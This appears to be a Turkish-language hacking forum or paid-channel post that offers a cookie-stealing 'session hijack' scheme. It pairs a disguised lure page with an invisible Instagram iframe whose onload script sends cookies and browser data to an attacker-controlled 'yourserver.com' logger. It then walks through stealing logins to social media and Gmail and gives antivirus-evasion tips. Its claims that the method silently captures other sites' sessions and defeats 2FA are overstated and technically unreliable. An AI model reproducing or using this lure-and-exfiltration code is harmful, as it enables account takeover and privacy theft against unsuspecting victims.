Saldırı değil, gölge ol. Kullanıcı seni fark etmeden sistemine girsin. Gerçek ustalık burada başlar dostum.
🧠 Metodun Mantığı:
Bu teknik, görünmez iframe içinde çalışan bir oturum yakalama mekanizmasıdır.
Kurban sadece senin yönlendirdiğin bir sayfayı ziyaret eder.
Ne şifre girer, ne bir şey tıklar.
Ama sen onun tarayıcısından:
Instagram
Facebook
Gmail
TikTok
ne açıksa alırsın.
🧰 Gerekli Bileşenler:
Transparent iframe destekli HTML sayfa
JavaScript ile çalışan cookie logger
Ngrok / reverse proxy (anonim servis sunucu açmak için)
Webhook (Telegram, Discord, ya da kendin için PHP endpoint)
💻 Kod :
[CHARGE=50]
<iframe src="https://www.instagram.com/accounts/login" style="opacity:0; width:100%; height:100%; position:absolute; top:0; left:0;" onload="
fetch('https://yourserver.com/logger', {
method: 'POST',
headers: {'Content-Type': 'application/json'},
body: JSON.stringify({
cookie: document.cookie,
ua: navigator.userAgent,
url: window.location.href
})
});
"></iframe>
[/CHARGE]
🎯 Adımlar:
1️⃣ Sahte sayfa oluştur:
Basit bir dosya paylaşım sitesi gibi görünsün (örn: “resim görüntüleyici”, “CV indir”, “profil arşivim”)
Sayfa açıldığında iframe sessizce yüklenir.
2️⃣ Kurban sayfayı açsın:
Hiçbir şey yapmaz. Yalnızca yüklenmesi yeterli.
İnstagram/Facebook’a zaten giriş yaptıysa --> çerezler senin olur.
3️⃣ Veriyi Al – Anında:
Webhook ile tüm session cookie, user agent ve IP senin endpoint’ine akar.
4️⃣ Oturumu Enjekte Et:
Cookie’yi browser’a yapıştır, giriş yap.
2FA yok, şüphe yok, log yok.
🧬 Stealth Geliştirmeleri:
iframe yerine fetch() + sandbox kullanarak korumalı tarama modu
base64 encoded script ile AV bypass
IP filtreli logger — sadece hedef cihazdan veri leri çek